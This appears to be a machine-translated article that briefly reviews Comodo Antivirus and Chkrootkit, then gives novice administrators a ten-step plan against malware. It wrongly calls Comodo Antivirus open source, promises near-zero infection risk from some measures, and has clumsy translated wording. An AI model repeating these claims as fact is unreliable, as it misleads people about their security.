For comfortable use of Comodo Antivirus, you will need a high-powered computer with a minimum processor frequency of 2 GHz and 2 GB of free RAM. You do not have to worry about running scans: it will be enough to configure their plan only once, and in the future they will be launched automatically. It is possible to start the analysis at any convenient time by pressing just one button. The antivirus in question is open source, distributed free of charge and downloaded from the official website.

Chkrootkit

Platform: Linux

Chkrootkit (Check Rootkit) is a program widely used by system administrators to protect the operating system from known rootkits. A rootkit is a collection of components, such as scripts, executables, or configuration files, that perform the function of masking, controlling, and collecting data. With the help of such tools, attackers penetrate the OS and get all the necessary information. The software mentioned above is just designed to protect the computer from this kind of activity. Chkrootkit does not require installation and can be run from a Live CD. Work in it is carried out through any convenient console, and management is clear even to an inexperienced user.

Chkrootkit works quite fast, does its job well, does not take up much space on the drive, but at the same time contains a huge number of modules for each type of user. On the official website, there are assemblies of the program in various extensions, and downloading is available from a direct source or several mirrors.

You have been introduced to antivirus solutions that will become best solution For various types servers. As you can see, each software has its own characteristics, so it will be most useful in certain situations.

How to properly organize the defense of computer networks from malware.

The article is addressed to novice system administrators.

By antivirus protection, I mean protection against any kind of malware: viruses, trojans, root kits, backdoors,…

1 Anti-virus protection step - install anti-virus software on each computer in the network and update it at least daily. Correct scheme updates of anti-virus databases: 1-2 servers go for updates and distribute updates to all computers in the network. Be sure to set a password to disable protection.

Antivirus software has many disadvantages. The main drawback is that they do not catch viruses written to order and which are not widely used. The second drawback is that they load the processor and take up memory on computers, some more (Kaspersky), some less (Eset Nod32), this must be taken into account.

Installing anti-virus software is a mandatory but insufficient way to protect against virus outbreaks, often a virus signature appears in anti-virus databases the next day after its distribution, in 1 day a virus can paralyze the operation of any computer network.

Usually, system administrators stop at step 1, worse, they don’t complete it or don’t follow the updates, and sooner or later the infection still occurs. Below I will list other important steps to strengthen anti-virus protection.

Step 2 Password policy. Viruses (trojans) can infect computers on the network by guessing passwords for standard accounts: root, admin, Administrator, Administrator. Always use complex passwords! For accounts without passwords or with simple passwords, the system administrator should be fired with a corresponding entry in the work book. After 10 attempts to enter an incorrect password, the account should be blocked for 5 minutes to protect against brute force (password guessing by simple enumeration). It is highly recommended that the built-in administrator accounts be renamed and disabled. Passwords need to be changed periodically.

Step 3 Restriction of user rights. A virus (trojan) spreads over the network on behalf of the user who launched it. If the user's rights are limited: there is no access to other computers, no administrative rights to his computer, then even a running virus will not be able to infect anything. It is not uncommon for system administrators themselves to become the culprits for the spread of a virus: they launched the admin key-gen and the virus went to infect all computers on the network ...

Step 4 Regular installation of security updates. It's hard work, but it has to be done. You need to update not only the OS, but also all applications: DBMS, mail servers.

Step 5 Restriction of ways of penetration of viruses. Viruses enter the local network of an enterprise in two ways: through removable media and through other networks (Internet). By denying access to USB, CD-DVD, you completely block 1 way. By restricting access to the Internet, you block the 2nd path. This method is very effective, but difficult to implement.

Step 6 Firewalls (ITU), they are also firewalls (firewalls), they are also firewalls. They must be installed at the network boundaries. If your computer is directly connected to the Internet, then ITU must be enabled. If the computer is connected only to a local area network (LAN) and accesses the Internet and other networks through servers, then it is not necessary to enable ITU on this computer.

Step 7 Dividing an enterprise network into subnets. It is convenient to break the network according to the principle: one department in one subnet, another department in another. Subnets can be divided at the physical layer (SCS), at the data link layer (VLAN), at the network layer (subnets not intersected by ip addresses).

Step 8 Windows has a wonderful tool for managing the security of large groups of computers - these are group policies (GPOs). Through GPO, you can configure computers and servers so that infection and distribution of malware becomes almost impossible.

Step 9 Terminal access. Raise 1-2 terminal servers on the network through which users will access the Internet and the probability of infection of their personal computers will drop to zero.

Step 10 Keeping track of all processes and services running on computers and servers. You can make it so that when an unknown process (service) starts, the system administrator is notified. Commercial software that can do this costs a lot, but in some cases the costs are justified.